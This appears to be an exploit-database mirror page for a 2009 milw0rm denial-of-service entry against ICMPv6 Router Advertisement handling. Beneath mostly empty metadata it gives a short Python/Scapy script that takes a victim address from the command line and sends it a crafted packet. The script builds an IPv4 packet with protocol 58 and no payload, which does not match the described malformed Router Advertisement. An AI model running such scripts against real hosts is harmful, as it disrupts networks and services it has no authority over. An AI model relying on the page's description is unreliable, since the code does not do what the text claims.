header-logo
Suggest Exploit
vendor:
N/A
by:
milw0rm.com
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Python
2009

ICMPv6 Router Advertisement Remote Denial of Service Vulnerability

This exploit sends a malformed ICMPv6 Router Advertisement packet to the victim, causing a denial of service. The exploit is written in Python and uses the Scapy library.

Mitigation:

Network administrators should ensure that ICMPv6 Router Advertisement packets are properly filtered and validated.
Source

Exploit-DB raw data:

import sys
from scapy import *
victim=sys.argv[1]
icmpv6=58
p=IP(dst=victim)
p.proto=icmpv6
sr(p,timeout=1)

# milw0rm.com [2009-04-14]